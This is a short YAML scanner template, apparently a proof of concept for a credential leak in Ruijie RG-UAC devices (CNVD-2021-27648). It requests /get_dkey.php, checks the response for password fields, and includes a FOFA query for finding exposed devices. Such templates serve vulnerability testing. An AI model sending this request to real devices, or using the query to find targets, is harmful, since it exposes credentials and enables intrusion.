id: CNVD-2021-27648

info:
    name: Ruijie RG-UAC Information Leakage Vulnerability
    author: doinb1517
    severity: critical
    verified: true
    description: |
        FOFA: title="RG-UAC登录页面"
        RUIJIE RG-UAC信息泄露
    reference:
      - https://www.cnvd.org.cn/flaw/show/CNVD-2021-27648
    tags: cnvd,cnvd2021,ruijie,leakage
    created: 2023/07/07

rules:
    r0:
      request:
          method: GET
          path: /get_dkey.php
      expression: |
        response.status == 200 && 
        response.body.bcontains(b'"password":') && 
        response.body.bcontains(b'"pre_define":') && 
        response.body.bcontains(b'"auth_method":') && 
        response.body.bcontains(b'"dkey_password":') 
expression: r0()